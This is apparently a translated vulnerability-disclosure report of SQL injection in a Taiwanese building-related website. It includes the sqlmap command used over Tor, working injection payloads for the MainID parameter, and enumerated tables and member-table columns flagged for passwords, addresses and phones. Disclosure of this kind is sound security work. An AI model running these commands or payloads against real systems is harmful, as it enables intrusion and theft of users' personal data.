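2015-12-10: Details reported to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to trainee white hats
2016-01-28: Details disclosed to the public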
SQL injection in Taiwan's 優築網
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/01_case/01_case_00_overview.php?MainID=1" --dbs --is-dba --current-db

Parameter: MainID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: MainID=1' AND 7235=7235 AND 'SUmO'='SUmO

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: MainID=1' AND (SELECT 1443 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(1443=1443,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DEGx'='DEGx

    Type: UNION query
    Title: Generic UNION query (N) - 11 columns
    Payload: MainID=1' UNION ALL SELECT 'N',CONCAT(0x716b7a6271,0x7361694776426169584f,0x7176707a71),'N','N','N','N','N','N','N','N','N'--

web application technology: Apache
back-end DBMS: MySQL 5.0
current database: 'vhost71706'
current user is DBA: False

Database: vhost71706
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| p_impeach_tb           | 11628   |
| c_news                 | 9750    |
| c_build_img            | 7646    |
| tb_sys_history         | 5711    |
| c_news_b               | 5077    |
| c_build_cdr            | 4804    |
| c_build_tb             | 3773    |
| hat_area               | 3144    |
| c_build_sp             | 1579    |
| c_member_tb            | 1262    |  =====> over 1,000 users
| c_contact              | 935     |
| c_build_img_dir        | 904     |
| c_build_direction_item | 843     |
| c_store_tb             | 781     |
| p_city_tb              | 389     |
| sys_city_tb            | 387     |
| hat_city               | 345     |
| p_fav_tb               | 333     |
| c_build_question       | 300     |
| unju_creation          | 275     |
| role1                  | 251     |
| c_forum_tb             | 241     |
| m_cms                  | 239     |
| c_build_img_date       | 237     |
| c_link                 | 103     |
| city_sory_detail       | 99      |
<....>

Database: vhost71706
Table: c_member_tb
[46 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| mid        | bigint(10) unsigned |
| zaddress1  | text                |  ==> address
| zboss      | varchar(50)         |
| zchild     | varchar(20)         |
| zcity1     | varchar(20)         |
| zcompany   | text                |
| zdate      | datetime            |
| zday       | char(2)             |
| zeditdate  | datetime            |
| zepaper    | varchar(5)          |
| zfirstname | text                |
| zid        | varchar(20)         |
| zjob       | bigint(5)           |
| zjob2      | bigint(5)           |
| zjobname   | varchar(20)         |
| zlink      | text                |
| zloginid   | text                |  ==> user
| zlv        | bigint(10)          |
| zmail      | varchar(100)        |
| zmarry     | varchar(20)         |
| zmoney     | varchar(20)         |
| zmonth     | char(2)             |
| zmsn       | text                |
| zname      | text                |
| zorder     | bigint(20)          |
| zpassa     | varchar(50)         |
| zpassq     | varchar(20)         |
| zpasswd    | text                |  ==> password
| zpic       | varchar(50)         |
| zpicsize   | text                |
| zprevid    | bigint(10)          |
| zschool    | varchar(20)         |
| zsex       | varchar(20)         |
| zsex2      | varchar(5)          |
| zskype     | text                |
| zstate     | varchar(5)          |
| ztel       | varchar(10)         |  ==> phone
| ztel2      | varchar(20)         |
| ztel3      | text                |
| ztel4      | text                |
| ztel5      | text                |
| ztel6      | text                |
| ztitle     | varchar(200)        |
| zuserid    | text                |
| zyear      | varchar(4)          |
| zzone1     | varchar(10)         |
+------------+---------------------+
Filter the input.
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-12-14 22:59
Thank you for the report.
None yet.